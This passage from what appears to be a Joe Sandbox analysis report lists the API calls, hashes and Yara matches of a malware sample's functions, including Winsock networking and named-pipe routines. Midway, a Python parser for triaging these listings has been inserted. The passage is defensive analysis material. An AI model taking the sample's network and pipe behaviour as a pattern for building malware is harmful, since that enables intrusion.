                                            • Instruction ID: 3baccc9280623390eff9989b6e88aeab6719df8e4fd585f647fca4af3c78e8bd
                                            • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                                            • Instruction Fuzzy Hash: 5D219D32705B4486EB24AF76E80872D67E6BB88BA4F54463DDA49477A6DF3CC4418700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 4099253644-0
                                            • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                            • Instruction ID: 964329dacca8d202794ebe75baa95e7a41d6936fc7c1e94c9d90d4d7da1c714d
                                            • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                                            • Instruction Fuzzy Hash: 7F313E25A06A42C1FF55EF51E86473823A2FB88B94F08163EDE5D063A1DF7CD844C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                            • String ID: d
                                            • API String ID: 1257931466-2564639436
                                            • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                            • Instruction ID: 2cee83ec675d99c2291e55027331306dd3382853370d6813cfdfcd591b39a63a
                                            • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                                            • Instruction Fuzzy Hash: D1318D32219BC5D6DB25CF61E84479A77A8F788B88F04512AEE8D47B28DF7CC555CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: write_multi_char$write_string$free
                                            • String ID:
                                            • API String ID: 2630409672-3916222277
                                            • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                            • Instruction ID: a1a4250d362e4ca9cc82363142c750dbaa3ecb25d79ff04b9fc37ab3d55a5f55
                                            • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                                            • Instruction Fuzzy Hash: F5910232688784C6EB21EB65E8083AE7B74F785795F641006EF8E57B59DB3CC942CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$ErrorLastSleepselectsend
                                            • String ID: d
                                            • API String ID: 2152284305-2564639436
                                            • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                            • Instruction ID: d884567ad3b756e569540b95a48ff097b10d056b599a170f55b598bcf10f27e4
                                            • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                                            • Instruction Fuzzy Hash: BE219D32618AC086D7608F21F88878E7375F788784F404269EB9D87A59DF3CD459CB44
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                                            • String ID:
                                            • API String ID: 3101085627-0
                                            • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                            • Instruction ID: 46e21124fff936a5cdcebdd9e5fbaec89d2b1eeecb34f02cb46047d6af39cf1d
                                            • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                                            • Instruction Fuzzy Hash: BA319E32B00A44CAEB109FB5D89479D3376F788B88F410126EE0E97A29DF3CC54AC750
                                            APIs
                                            • _errno.LIBCMT ref: 0078624E
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00786245
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __doserrno.LIBCMT ref: 007862AB
                                            • _errno.LIBCMT ref: 007862B2
                                            • _invalid_parameter_noinfo.LIBCMT ref: 00786316
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 388111225-0
                                            • Opcode ID: ea0d942e7f4d05c4406ce8f1ea8e5e2e8f056981f1351fad02dfabebb030488e
                                            • Instruction ID: 7802523f34284a219da6f1d0c995f28074039bcc40fea8256c6e60cffe1cf3cd
                                            • Opcode Fuzzy Hash: ea0d942e7f4d05c4406ce8f1ea8e5e2e8f056981f1351fad02dfabebb030488e
                                            • Instruction Fuzzy Hash: 08213A72750394D6C7167F76AC9A32D3A15B7C1BA0FD58129EE2217B92CB7CC882C710
                                            APIs
                                            • _errno.LIBCMT ref: 007D6E4E
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D6E45
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __doserrno.LIBCMT ref: 007D6EAB
                                            • _errno.LIBCMT ref: 007D6EB2
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007D6F16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 388111225-0
                                            • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                            • Instruction ID: 21d543e34808e5194ea8b48402a5253822f08d86b170e4ed2e00bec71f23d0b8
                                            • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                                            • Instruction Fuzzy Hash: 1C21F572710750D6C716AF75E88532D3A71BB81BA0FE54627EE2517792CB7CC882C720
                                            APIs
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0078F176
                                            • _errno.LIBCMT ref: 0078F16B
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1812809483-0
                                            • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                            • Instruction ID: dbad96ecc818bd7ffdda8285b834669ddccad490edaf76b193e99e44b109e7f6
                                            • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                                            • Instruction Fuzzy Hash: 26412476A90399C6DF20BB22D5482AD76A0F755BE4FA04236EB9447B84D73CC8528700
                                            APIs
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007DFD76
                                            • _errno.LIBCMT ref: 007DFD6B
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1812809483-0
                                            • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                            • Instruction ID: abfac38bb35a4aa3eec2657031dadff5ca8724d1345d8afb8f19dfa94dee096f
                                            • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                                            • Instruction Fuzzy Hash: 9A41377270439186DF20EB2295402BD37B1EB64BA4FA44237EB9647BA6D73CC9828710
                                            APIs
                                              • Part of subcall function 007D0264: _mtinitlocknum.LIBCMT ref: 007D3DAA
                                              • Part of subcall function 007D0264: _amsg_exit.LIBCMT ref: 007D3DB6
                                            • DecodePointer.KERNEL32 ref: 007D02D8
                                            • DecodePointer.KERNEL32 ref: 007D02F6
                                            • EncodePointer.KERNEL32 ref: 007D0324
                                            • DecodePointer.KERNEL32 ref: 007D0339
                                            • EncodePointer.KERNEL32 ref: 007D0344
                                            • DecodePointer.KERNEL32 ref: 007D0356
                                            • DecodePointer.KERNEL32 ref: 007D0366
                                            • __crtCorExitProcess.LIBCMT ref: 007D03EA
                                            • ExitProcess.KERNEL32 ref: 007D03F2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                                            • String ID:
                                            • API String ID: 1550138920-0
                                            • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                            • Instruction ID: 9512c96856bb3f9a180dbbaa08c9f90c893f17d67c95fdaa07cea900059a7313
                                            • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                                            • Instruction Fuzzy Hash: AC41AD3160AB8486EB509F12F84432977B9F789BC4F44512AEE8E43B65DF7CD99AC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                            • String ID:
                                            • API String ID: 3339321253-0
                                            • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                            • Instruction ID: d030e29be8f3f18246d0ef7cedc611b78a2530feaf34576ab3717cd7c8c87aa5
                                            • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                                            • Instruction Fuzzy Hash: 00314662318694D2DB249F21F994BAA6365F748B98F54012CDE0E477A9EF3CC65AC700
                                            APIs
                                              • Part of subcall function 007C6BE0: htonl.WS2_32 ref: 007C6C3D
                                              • Part of subcall function 007C6BE0: select.WS2_32 ref: 007C6CAB
                                              • Part of subcall function 007C6BE0: __WSAFDIsSet.WS2_32 ref: 007C6CC3
                                              • Part of subcall function 007C6BE0: accept.WS2_32 ref: 007C6CE0
                                              • Part of subcall function 007C6BE0: ioctlsocket.WS2_32 ref: 007C6CF8
                                              • Part of subcall function 007C6BE0: __WSAFDIsSet.WS2_32 ref: 007C6D9B
                                            • GetTickCount.KERNEL32 ref: 007C6BAA
                                              • Part of subcall function 007C6F2C: malloc.LIBCMT ref: 007C6F5E
                                              • Part of subcall function 007C6F2C: htonl.WS2_32 ref: 007C6F91
                                              • Part of subcall function 007C6F2C: recvfrom.WS2_32 ref: 007C6FD5
                                              • Part of subcall function 007C6F2C: WSAGetLastError.WS2_32 ref: 007C6FE2
                                            • GetTickCount.KERNEL32 ref: 007C6BC2
                                            • GetTickCount.KERNEL32 ref: 007C70E0
                                            • GetTickCount.KERNEL32 ref: 007C70F6
                                            • shutdown.WS2_32 ref: 007C7115
                                            • shutdown.WS2_32 ref: 007C712A
                                            • closesocket.WS2_32 ref: 007C7134
                                            • free.LIBCMT ref: 007C7154
                                            • free.LIBCMT ref: 007C7169
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                                            • String ID:
                                            • API String ID: 3610715900-0
                                            • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                            • Instruction ID: ae9ee4845d24cd6c100e15d5ebcd7fbc47dc32262bf9e2ff9858bdad4572092e
                                            • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                                            • Instruction Fuzzy Hash: 40216232608A85C2DB289F66E985B296365F788F84F18812DCE4D87615DF3CD895CB11
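The per-function "APIs" listings above are easier to triage in bulk than by eye, so here is a small parser for that listing shape, written as an added example for this report; it is not Joe Sandbox's own code. It assumes only the two line shapes visible in the listing (a direct call `• name.MODULE ref: ADDR` and a nested `• Part of subcall function ADDR: name.MODULE ref: ADDR`) plus the `• API String ID:` line, and the behaviour tags at the end are my own heuristic grouping, not a field of the report. The sample input is constructed from lines of the listing above.

```python
import re

# Constructed sample input in the shape of the report's per-function "APIs"
# listing (lines copied from the listing above; the indented lines are calls
# that happen inside a subcall rather than in the function itself).
SAMPLE = """\
APIs
  • Part of subcall function 007C6F2C: recvfrom.WS2_32 ref: 007C6FD5
  • Part of subcall function 007C6F2C: WSAGetLastError.WS2_32 ref: 007C6FE2
• GetTickCount.KERNEL32 ref: 007C6BC2
• shutdown.WS2_32 ref: 007C7115
• closesocket.WS2_32 ref: 007C7134
• free.LIBCMT ref: 007C7154
Memory Dump Source
• Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• API String ID: 3610715900-0
APIs
• GetComputerNameExA.KERNEL32 ref: 007CB5EA
• GetUserNameA.ADVAPI32 ref: 007CB654
  • Part of subcall function 007BF014: WSASocketA.WS2_32 ref: 007BF042
• malloc.LIBCMT ref: 007CB76D
• API String ID: 632458648-2040033107
"""

# One regex covers both line shapes; the "Part of subcall function" prefix is optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Heuristic tags (an assumption of this example, not a Joe Sandbox field):
# API names that, seen together in one function, suggest a behaviour.
TAG_RULES = {
    "host_fingerprint": {"GetComputerNameA", "GetComputerNameExA", "GetUserNameA"},
    "timing": {"GetTickCount"},
}


def parse_blocks(text):
    """Split the listing into per-function blocks, each holding its calls and API String ID."""
    blocks = []
    cur = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"calls": [], "api_string_id": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            cur["calls"].append({
                "api": m["api"],
                "module": m["module"],
                "ref": int(m["ref"], 16),
                "sub": int(m["sub"], 16) if m["sub"] else None,
            })
        elif s.startswith("• API String ID:"):
            cur["api_string_id"] = s.split(":", 1)[1].strip()
    return blocks


def summarize(block):
    """Collapse one block into the sets a triage note needs: direct calls,
    calls grouped by the subcall they live in, modules touched, and tags."""
    direct = {c["api"] for c in block["calls"] if c["sub"] is None}
    nested = {}
    for c in block["calls"]:
        if c["sub"] is not None:
            nested.setdefault(c["sub"], set()).add(c["api"])
    modules = {c["module"] for c in block["calls"]}
    all_apis = direct.union(*nested.values())
    tags = {tag for tag, names in TAG_RULES.items() if all_apis & names}
    if "WS2_32" in modules:          # any Winsock use is worth a tag on its own
        tags.add("winsock")
    return {
        "direct": direct,
        "nested": nested,
        "modules": modules,
        "tags": tags,
        "api_string_id": block["api_string_id"],
    }


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        s = summarize(b)
        print(s["api_string_id"], sorted(s["tags"]), sorted(s["direct"]),
              {hex(k): sorted(v) for k, v in s["nested"].items()})
```

Keeping the subcall address on each nested call matters: in the listing, `recvfrom` and `WSAGetLastError` belong to function 007C6F2C, not to the function whose block they appear in, so a summary that flattened them would attribute socket reads to the wrong routine when you go to cross-reference the address in the memory dump.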
                                            APIs
                                            • _errno.LIBCMT ref: 00787033
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 0078702B
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 00787077
                                            • _lseeki64_nolock.LIBCMT ref: 00787090
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                            • String ID:
                                            • API String ID: 4140391395-0
                                            • Opcode ID: d2043cf647e2d163a3c2a2dc567be0db299a39fca6af203152feee3ec89ee6f1
                                            • Instruction ID: c03bc60ed8853d7f27d303ae7f98438f331e3abf27e0fe8ab42eb982cc90739a
                                            • Opcode Fuzzy Hash: d2043cf647e2d163a3c2a2dc567be0db299a39fca6af203152feee3ec89ee6f1
                                            • Instruction Fuzzy Hash: F211E72278824485D7097F259C4A32DB911A780BF1FA94715AE3A073D1C77CC442C761
                                            APIs
                                            • _errno.LIBCMT ref: 00786EBB
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00786EB3
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 00786EFF
                                            • _lseek_nolock.LIBCMT ref: 00786F18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                            • String ID:
                                            • API String ID: 310312816-0
                                            • Opcode ID: 47749ff80f82cc4cc053cc521a19ae166eb4ca3a5f54a64a61986bb395727df3
                                            • Instruction ID: 66b6f8056e0210d2be6cb85e7eadc80c19f2bcd465ca38b19383889360cbab5a
                                            • Opcode Fuzzy Hash: 47749ff80f82cc4cc053cc521a19ae166eb4ca3a5f54a64a61986bb395727df3
                                            • Instruction Fuzzy Hash: 01112632B9068095D7027F65FC4A33D7A61BB807A1F9A4119FB190B3D2CB7CC882C724
                                            APIs
                                            • _errno.LIBCMT ref: 007D7ABB
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D7AB3
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D7AFF
                                            • _lseek_nolock.LIBCMT ref: 007D7B18
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                                            • String ID:
                                            • API String ID: 310312816-0
                                            • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                            • Instruction ID: 71d638107209372677b4fe5862aaa36372d5953e2e9f657b01d3527f1424fb05
                                            • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                                            • Instruction Fuzzy Hash: F2119E72718640D6D70A6F65DC4933D7631BB807B1F9A4517EA190B3E2DB7CC881C320
                                            APIs
                                            • _errno.LIBCMT ref: 007D7C33
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D7C2B
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D7C77
                                            • _lseeki64_nolock.LIBCMT ref: 007D7C90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                            • String ID:
                                            • API String ID: 4140391395-0
                                            • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                            • Instruction ID: a9baa64aaa45fecb97fa789ab6da90720689e71b4b4d6b52addf9668be47da5d
                                            • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                                            • Instruction Fuzzy Hash: F111E7227246409AD71A6F25D84932D7935BB80BB1F5A4716AE3D073D2EB7C8441C731
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno
                                            • String ID:
                                            • API String ID: 2288870239-0
                                            • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                            • Instruction ID: 3770f5db00b98a46175e223110d261ef37c3c506888108760a83e80c30b95ec9
                                            • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                                            • Instruction Fuzzy Hash: A1314D21B1AA41D2EF1AEF15ED6936C2360BBEABE0F4C8225D91E46661DF3CD544C312
                                            APIs
                                            Strings
                                            • Address %p has no image-section, xrefs: 00401DC0
                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                            • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                            • Mingw-w64 runtime failure:, xrefs: 00401D88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: QueryVirtual
                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                            • API String ID: 1804819252-1534286854
                                            • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                                            • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                                            • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                                            • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                                            APIs
                                            • _errno.LIBCMT ref: 0078585F
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 00785857
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            • __lock_fhandle.LIBCMT ref: 007858A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                            • String ID:
                                            • API String ID: 2611593033-0
                                            • Opcode ID: 8d3f92f90ff9cde3f8d463bec0bf82c50d6153501e501c1854d844cf26b3f735
                                            • Instruction ID: df25f955753fec16b7ae4930a0d25e46c40c5686e87725d486579a195fc0b14e
                                            • Opcode Fuzzy Hash: 8d3f92f90ff9cde3f8d463bec0bf82c50d6153501e501c1854d844cf26b3f735
                                            • Instruction Fuzzy Hash: 80113B32B84A84C6D7017F26EC4933D7A60A780BF1F9A4116EB151B3D2DB7CC842D720
                                            APIs
                                            • _errno.LIBCMT ref: 007D645F
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007D6457
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            • __lock_fhandle.LIBCMT ref: 007D64A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                            • String ID:
                                            • API String ID: 2611593033-0
                                            • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                            • Instruction ID: 386f3e0b9d305e2f5610ff6d270dcf9c4d72e69a5c748db85755be09fc04b260
                                            • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                                            • Instruction Fuzzy Hash: 2B117B3271428096D7166F25DD4933D3931BB80BB1F9A4517EA19073D2CB7CC881C731
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
